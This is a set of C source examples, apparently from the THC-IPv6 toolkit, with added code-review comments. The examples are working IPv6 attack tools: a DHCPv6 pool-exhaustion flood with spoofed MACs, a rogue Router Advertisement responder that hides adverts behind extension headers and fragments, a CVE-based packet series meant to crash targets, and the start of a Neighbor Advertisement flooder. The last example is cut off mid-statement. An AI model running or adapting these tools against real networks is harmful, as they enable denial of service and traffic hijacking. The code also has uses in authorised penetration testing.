Пример #1
/*
 * Sends one ICMPv6 Router Solicitation from the given interface and then
 * passes captured "ip6 and icmp6" packets to dump_ra_reply() until the
 * 5-second alarm invokes clean_exit().
 *
 * Arguments as parsed below: [-r] interface [destination]. Without a
 * destination the solicitation is addressed to ff02::2 (all-routers
 * multicast).
 *
 * seen, help(), clean_exit() and dump_ra_reply() are not defined in this
 * function; they are presumably file-scope - confirm against the full file.
 */
int main(int argc, char *argv[]) {
    char *interface, string[] = "ip6 and icmp6";
    unsigned char *mac6, buf[512];
    unsigned char *dst = thc_resolve6("ff02::2");
    int i;
    unsigned char *pkt = NULL;
    int pkt_len = 0;
    int rawmode = 0;
    pcap_t *p;

    if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
        help(argv[0]);

    while ((i = getopt(argc, argv, "r")) >= 0) {
        switch (i) {
        case 'r':
            thc_ipv6_rawmode(1);
            rawmode = 1;
            break;
        default:
            fprintf(stderr, "Error: invalid option %c\n", i);
            exit(-1);
        }
    }

    // NOTE(review): when only "-r" is given, argv[optind] is NULL and is
    // passed to thc_get_own_mac() unchecked - confirm how it handles NULL.
    interface = argv[optind];
    if ((mac6 = thc_get_own_mac(interface)) == NULL) {
        fprintf(stderr, "Error: invalid interface %s\n", interface);
        exit(-1);
    }
    // Optional second positional argument replaces the default destination.
    // NOTE(review): the result of thc_resolve6() is not checked for NULL.
    if (argc - optind > 1 && argv[optind + 1] != NULL)
        dst = thc_resolve6(argv[optind + 1]);

    // ICMPv6 option carried in the solicitation: type 1, length 1 (one
    // 8-byte unit), followed by our own 6-byte MAC; i is the option size.
    memset(buf, 0, sizeof(buf));
    buf[0] = 1;
    buf[1] = 1;
    memcpy(buf + 2, mac6, 6);
    i = 8;
    memset(seen, 0, sizeof(seen));

    // Open the capture before sending so replies are not missed.
    if ((p = thc_pcap_init(interface, string)) == NULL) {
        fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
        exit(-1);
    }

    // NOTE(review): the error returns below leave pkt and the capture
    // handle unreleased; the process ends right after, so this is cosmetic.
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL)
        return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
        return -1;
    if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
        return -1;

    // Listen for five seconds; the loop itself never ends, termination is
    // left to the SIGALRM handler.
    signal(SIGALRM, clean_exit);
    alarm(5);
    while (1) {
        // Drain every packet currently queued, then yield briefly.
        while (thc_pcap_check(p, (char *) dump_ra_reply, NULL) > 0);
        usleep(100);
    }
    return 0;
}
Пример #2
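/*
 * pcap callback for captured DHCPv6 traffic addressed to UDP port 546.
 *
 * Accepts only frames of at least 140 captured bytes whose IPv6 next
 * header is UDP and whose DHCPv6 message type (byte 62) is 2, walks the
 * option list and builds a message of type 3 in mybuf that echoes the
 * transaction id plus the options with low code byte 1, 2 or 3 (and 39
 * when do_dns is set), then sends it back to the sender of the frame.
 *
 * The frame comes from the network and is untrusted: every option length
 * is checked against the bytes left in the capture and against the space
 * left in mybuf before anything is copied.
 *
 * foo    - unused pcap user pointer.
 * header - pcap header; only caplen is read.
 * data   - start of the captured Ethernet frame.
 *
 * interface, do_dns and counter are file-scope variables defined outside
 * this function.
 */
void check_packets(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) {
    int len = header->caplen, pkt_len = 0, mlen = 10, olen, code;
    unsigned char *ptr = (unsigned char *) data, *pkt = NULL;
    char mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e };
    // Start from the fallback MAC so smac is never read uninitialised when
    // the frame carries no option with code 1.
    char *smac = mac;
    // Reply template: message type 3, three transaction-id bytes (filled in
    // below), then option 8 with length 2 and value 0.
    char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 };

    if (len < 140 || data[20] != NXT_UDP || data[62] != 2)
        return;
    // Skip Ethernet (14) + IPv6 (40) + UDP (8) headers.
    data += 62;
    len -= 62;

    // Echo the transaction id, then step over the 4-byte DHCPv6 header.
    memcpy(mybuf + 1, data + 1, 3);
    data += 4;
    len -= 4;
    while (len >= 4) {
        // Option header: 2-byte code, 2-byte big-endian length.
        olen = data[2] * 256 + data[3];
        if (olen > len - 4) {
            // Declared length runs past the captured bytes.
            printf("Information: evil packet received\n");
            len = -1;
            break;
        }
        // NOTE(review): only the low byte of the option code is examined,
        // as in the original; the high byte (data[0]) is ignored.
        code = data[1];
        if (code == 1 || code == 2 || code == 3 || (code == 39 && do_dns)) {
            // The capture can be far larger than mybuf; refuse rather than
            // write past the end of the 1024-byte reply buffer.
            if (olen + 4 > (int) sizeof(mybuf) - mlen) {
                printf("Information: evil packet received\n");
                len = -1;
                break;
            }
            memcpy(mybuf + mlen, data, olen + 4);
            if (code == 1) {
                // Point smac at the client MAC inside the packet when the
                // option has the 14-byte form, else keep the fallback MAC.
                if (olen == 14)
                    smac = (char *) (data + 12);
                else
                    smac = mac;
            } else if (code == 39 && olen > 0) {
                mybuf[mlen + 4] = 1;    // force server to write dns entry
            }
            mlen += olen + 4;
        }
        data += olen + 4;
        len -= olen + 4;
    }

    if (len >= 0) {
        counter++;
        // Addresses are taken from the captured frame: ptr + 38 is its IPv6
        // destination, ptr + 22 its IPv6 source, ptr + 6 its Ethernet source.
        // NOTE(review): the early returns below leave pkt unreleased unless
        // the library frees it on failure - confirm before adding a destroy.
        if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ptr + 38, ptr + 22, 1, 0, 0, 0, 0)) == NULL)
            return;
        if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0)
            return;
        if (thc_generate_and_send_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0)
            return;
        pkt = thc_destroy_packet(pkt);
        if (counter % 100 == 0)
            printf("!");
    }
}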
Пример #3
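/*
 * pcap callback: answers a captured ICMPv6 Router Solicitation with a
 * Router Advertisement sent to the solicitor's own MAC and IPv6 address.
 *
 * Depending on the file-scope switches do_hop, do_frag and do_dst the
 * advertisement is placed behind a hop-by-hop header, one or more
 * one-shot fragment headers and/or a destination header, and in the
 * do_dst case it is sent as fragments. Defensive reference for this
 * traffic shape: RFC 6105 (RA-Guard) and RFC 7113, which covers
 * advertisements carried behind extension headers or in fragments.
 *
 * foo    - unused pcap user pointer.
 * header - pcap header; only caplen is read.
 * data   - start of the captured Ethernet frame (untrusted).
 *
 * frint, frip6, frmac, frbuf, frbuflen, frbuf2, frbuf2len, buf3, frhdr,
 * myoff, type, do_hop, do_frag and do_dst are defined outside this function.
 */
void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *pkt = NULL, *dstmac = (unsigned char *) data + 6, *dst = (unsigned char *) data + 14 + 8, *ipv6hdr = (unsigned char *) (data + 14);

  // cnt was read uninitialised by cnt++ below; start it at a defined value.
  int pkt_len = 0, cnt = 0, i;

  // Length first: ipv6hdr[40] is byte 54 of the frame and must not be read
  // from a capture shorter than that.
  if (header->caplen < 14 + 40 + 2 || ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL)
    return;

  // NOTE(review): the early returns after this point leave pkt unreleased
  // unless the library frees it on failure - confirm.
  if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return;
  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0)
      return;
  }
  if (do_frag) {
    // NOTE(review): this overrides a type set by do_hop and loops
    // do_frag + 1 times (<=) - confirm both are intended.
    type = NXT_FRAG;
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
        return;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, frbuf, frbuflen, 0) < 0)
    return;
  if (do_dst) {
    // Build the frame without sending it, then send everything after the
    // 40-byte IPv6 header (plus myoff) as fragments.
    // NOTE(review): return values of both calls are ignored here.
    thc_generate_pkt(frint, frmac, dstmac, pkt, &pkt_len);
    frhdr = (thc_ipv6_hdr *) pkt;
    thc_send_as_fragment6(frint, frip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
  } else {
    if (thc_generate_and_send_pkt(frint, frmac, dstmac, pkt, &pkt_len) < 0)
      return;
  }
  pkt = thc_destroy_packet(pkt);
}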
Пример #4
/*
 * Runs a numbered sequence of IPv6 test cases against one target and then
 * reports whether the target still answers a ping6.
 *
 * Arguments as parsed below: [-r] [-p] interface target [test-number].
 * test-number 0 (the default) runs every case, any other value runs only
 * the case with that running number. With -p neither liveness ping is
 * sent and the final line prints PASSED without any evidence, so a PASSED
 * result under -p says nothing about the target.
 *
 * rawmode, do_hdr_size, ports, help() and check_alive() are not defined
 * in this function; presumably file-scope - confirm against the full file.
 */
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src ";
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i = 0, j, srcmtu, fragsize, offset = 14;
  pcap_t *p;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  // Options are matched positionally: -r is only recognised first, -p
  // only directly after it (or first when -r is absent).
  // NOTE(review): argc was checked before these shifts, so after one or
  // two shifts argv[1] or argv[2] can be NULL and is used unchecked below.
  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }
  if (strcmp(argv[1], "-p") == 0) {
    noping = 1;
    argv++;
    argc--;
  }
  
  // offset is the number of bytes in front of the IPv6 header inside
  // hdr->pkt; 14 unless do_hdr_size overrides it.
  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[1];
  // NOTE(review): neither the thc_resolve6() results nor the malloc(16)
  // behind ldst6 are checked before the memcpy/memset below.
  dst6 = thc_resolve6(argv[2]);
  route6 = thc_resolve6("2a01::");
  // ldst6: copy of the target address with bytes 0-7 replaced by fe80::/64.
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(buf, 0, sizeof(buf));
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  // Complete the two capture filters with the textual addresses.
  // NOTE(review): unbounded strcat into 64-byte buffers; it relies on the
  // length of what thc_ipv62notation() returns, which is not visible here.
  strcat(string, thc_ipv62notation(src6));
  strcat(string2, thc_ipv62notation(dst6));
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  if (do_hdr_size)
    srcmtu -= (do_hdr_size - 14);
  // Fragment payload size: MTU minus 62 bytes, rounded down to a multiple
  // of 8.
  fragsize = ((srcmtu - 62) / 8) * 8;

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(tests, 0, sizeof(tests));

  // Baseline: the target must answer before any test case is sent.
  printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]);
  if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) {
    fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]);
    exit(-1);
  } else
    printf("Test  0: normal ping6\t\t\t\tPASSED - we got a reply\n");

  /********************** TEST CASES ************************/

  // Every case follows the same pattern: run when test is 0 or equals
  // count, then count++. The early "return -1" paths inside the cases
  // leave mal, pkt and the capture handle unreleased.

  // Case 1: echo request with a 65864-byte payload, sent as fragments.
  if (test == 0 || test == count) {     // 1432
    printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count);
    tmplen = 65864;
    if ((mal = malloc(tmplen)) == NULL)
      return -1;
    memset(mal, count % 256, tmplen);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    // NOTE(review): return value not checked, unlike the other calls here.
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    // because of the different possible checksum calculations we have to do them all
    // (bytes offset + 40 + 2 and + 3 are patched in place between sends)
    hdr->pkt[offset + 40 + 3] = 0xe5;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 2] = 0x98;
    hdr->pkt[offset + 40 + 3] = 0xa4;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 3] = 0xa3;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 2] = 0x84;
    hdr->pkt[offset + 40 + 3] = 0x90;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 3] = 0x8f;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    free(mal);
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  // Case 2: same construction with a 65527-byte payload.
  if (test == 0 || test == count) {     // 1432
    printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count);
    tmplen = 65527;
    if ((mal = malloc(tmplen)) == NULL)
      return -1;
    memset(mal, count % 256, tmplen);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    // because of the different possible checksum calculations we have to do them all
    hdr->pkt[offset + 40 + 2] = 0x31;
    hdr->pkt[offset + 40 + 3] = 0x8c;
    // NOTE(review): the two sends below ignore the return value, unlike
    // the first send of this case.
    thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
    hdr->pkt[offset + 40 + 3] = 0x8a;
    thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
    free(mal);
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  // Case 3: router advertisement assembled by hand in buf.
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
    memset(bla, count % 256, sizeof(bla));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    memset(buf, 0, sizeof(buf));
    buf[6] = 4;                 // 4-7: retrans timer
    // option mtu
    buf[8] = 5;
    buf[9] = 1;
    buf[12] = mtu / 16777216;
    buf[13] = (mtu % 16777216) / 65536;
    buf[14] = (mtu % 65536) / 256;
    buf[15] = mtu % 256;
    // option prefix
    buf[16] = 3;
    buf[17] = 4;
    buf[18] = 128;              // prefix length // BUG IS HERE
    buf[19] = 128 + 64;
    memset(&buf[20], 17, 4);
    memset(&buf[24], 4, 4);
    memcpy(&buf[32], route6, 16);
    // NOTE(review): i is 0 on entry (set at its declaration, untouched
    // until here), so the running offset below does not match the byte
    // offsets quoted in the trailing comments - confirm the intended layout.
    i += 28;
    // mac address option
    buf[i++] = 1;
    buf[i++] = 1;
    memcpy(buf + i, srcmac, 6);
    i += 6;
    // default route routing option
    buf[i++] = 0x18;            // routing entry option type
    buf[i++] = 0x03;            // length 3 == 24 bytes
    buf[i++] = 0x00;            // prefix length
    buf[i++] = 0x08;            // priority, highest of course
    i += 2;                     // 52-53 unknown
    buf[i++] = 0x11;            // lifetime, word
    buf[i++] = 0x11;            // lifetime, word
    i += 16;                    // 56-71 address, all zeros for default
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  // Case 4: echo request, then a "too big" message built from the
  // inverted request, then one TCP SYN per entry of ports[].
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
      return -1;
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
    sleep(1);
    thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
    // NOTE(review): pkt from the echo request is overwritten in the loop
    // below without thc_destroy_packet() - looks like a leak, confirm.
    i = 0;
    // ports[] is walked until its 0 terminator.
    while (ports[i] != 0) {
      if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
        return -1;
      if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
        return -1;
      if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
        return -1;
      pkt = thc_destroy_packet(pkt);
      pkt_len = 0;
      i++;
    }
  }
  count++;

/*
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;
*/
/*
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count%256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;
*/

  // more?

  /******************* END OF TESTCASES ***************************/

  // Final liveness check; with -p (noping == 1) no ping is sent and the
  // PASSED branch is taken unconditionally.
  if (noping == 1 || check_alive(p, interface, src6, dst6))
    printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count);
  else
    printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count);

  thc_pcap_close(p);

  return 0;
}
Пример #5
/*
 * Sends DHCPv6 messages built from the `solicit` template from UDP port
 * 546 to port 547 in an endless loop and, unless -1 is given, hands any
 * captured replies to check_packets() after each send.
 *
 * Arguments as parsed below: [-n] [-N] [-1] [-d name] [-r] interface
 * [destination]; the destination defaults to ff02::1:2.
 *   -n  use the interface's own MAC instead of a randomised one
 *   -N  as -n, and also use the interface's own link-local address
 *   -1  do not process replies
 *   -d  append the DNS update blocks and the given name to each message
 *   -r  accepted and ignored
 *
 * Seen from the network, every iteration carries new random bytes in the
 * message and, without -n/-N, a different client MAC and source address,
 * so each message looks like it comes from a new client.
 *
 * interface, do_dns, dns_name, solicit, dnsupdate1, dnsupdate2, _TAKE3,
 * help() and check_packets() are defined outside this function.
 */
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  char wdatabuf[1024];
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, pkt_len = 0, dlen = 0;
  unsigned long long int count = 0;
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 0, use_real_link = 0;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;        // no break
      // deliberate fall-through: -N implies -n
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'd':
      do_dns = 1;
      dns_name = optarg;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  // This clears the initialiser above, so mac starts as all zeroes.
  memset(mac, 0, sizeof(mac));
  // NOTE(review): argv[optind] is NULL when no interface follows the
  // options; it is used unchecked below.
  interface = argv[optind];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  if (argc - optind <= 1)
    dst = thc_resolve6("ff02::1:2");
  else
    dst = thc_resolve6(argv[optind + 1]);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  // NOTE(review): dst is not part of this check.
  if (src == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
    exit(-1);
  }

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  // Assemble the message once: template, then (with -d) dnsupdate1, the
  // name and dnsupdate2.
  // NOTE(review): wdatabuf is 1024 bytes; the sizes of solicit, dnsupdate1
  // and dnsupdate2 are not visible here, so the bound cannot be confirmed.
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  if (do_dns) {
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    dlen = len + 8;
    len += sizeof(dnsupdate1);
    // Names of 240 bytes or more are silently left out; dnsupdate2 is
    // still appended.
    if (dns_name != NULL && strlen(dns_name) < 240) {
      // Make sure the name starts with a dot.
      if (dns_name[0] != '.') {
        wdatabuf[len] = '.';
        // presumably the two length bytes covering the name - TODO confirm
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      // The terminating NUL is copied and counted as well.
      memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
      wdatabuf[dlen - 5] += strlen(dns_name) + 1;
      wdatabuf[dlen - 3] += strlen(dns_name) + 1;
      len += strlen(dns_name) + 1;
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
  }

  printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
  while (1) {
    count++;
    // Without -N the low 8 bytes of the source address are the counter.
    if (!use_real_link)
      memcpy(src + 8, (char *) &count, 8);
    // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
    // (the loop fills three bytes of each range and mac[2..4])
    for (i = 0; i < 3; i++) {
      wdatabuf[i + 32] = rand() % 256;
      wdatabuf[i + 18] = rand() % 256;
      mac[i + 2] = rand() % 256;
      if (do_dns)
        wdatabuf[i + dlen] = 'a' + rand() % 26;
    }
    if (!use_real_mac)
      memcpy(wdatabuf + 22, mac, 6);
    // Bytes 1-3 of the message come from three bytes of the counter; the
    // offset _TAKE3 is defined elsewhere.
    memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);

    // NOTE(review): these returns skip closing the capture and socket.
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
      return -1;
    // we have to tone it down, otherwise we will not get advertisements
    if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
      printf("!");
    pkt = thc_destroy_packet(pkt);
    if (do_all) {
      usleep(75);
      // Drain all queued replies through check_packets().
      while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
    }
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;                     // never reached
}
Пример #6
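/*
 * Sends ICMPv6 Neighbor Advertisements in an endless loop, each one for a
 * freshly randomised address/MAC pair, to ff02::1 or to a given target.
 *
 * Arguments as parsed below: [-k | -m mac] interface [target].
 *   -k      use the interface's own MAC as Ethernet source
 *   -m mac  use the given xx:xx:xx:xx:xx:xx MAC as Ethernet source
 * In both cases only the Ethernet source is fixed; the link-layer address
 * advertised inside the payload is still randomised per packet.
 *
 * Fixes over the original: the -m value is parsed into unsigned int
 * temporaries (the original scanned %x straight into unsigned char slots,
 * writing four bytes per field and running past srcmac), a malformed -m
 * value is rejected, and a NULL own address is reported instead of being
 * written through.
 */
int main(int argc, char *argv[]) {
  char *interface, mac[6] = "";
  unsigned char *mac6 = mac, *ip6;
  unsigned char buf[24], srcmac[8] = "", *smac = NULL;
  unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst);
  unsigned int octet[6];
  int i;
  unsigned char *pkt = NULL;
  int pkt_len = 0, flags, rawmode = 0, count = 0, prefer = PREFER_LINK, keepmac = 0;

  if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) {
    keepmac = 1;
    // argv[2] is the interface here; it becomes argv[1] after the shift.
    if ((smac = thc_get_own_mac(argv[2])) == NULL) {
      fprintf(stderr, "Error: invalid interface %s\n", argv[2]);
      exit(-1);
    }
    argv++;
    argc--;
  }
  if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) {
    // %x stores an unsigned int, so scan into ints and narrow afterwards.
    if (sscanf(argv[2], "%x:%x:%x:%x:%x:%x", &octet[0], &octet[1], &octet[2], &octet[3], &octet[4], &octet[5]) != 6) {
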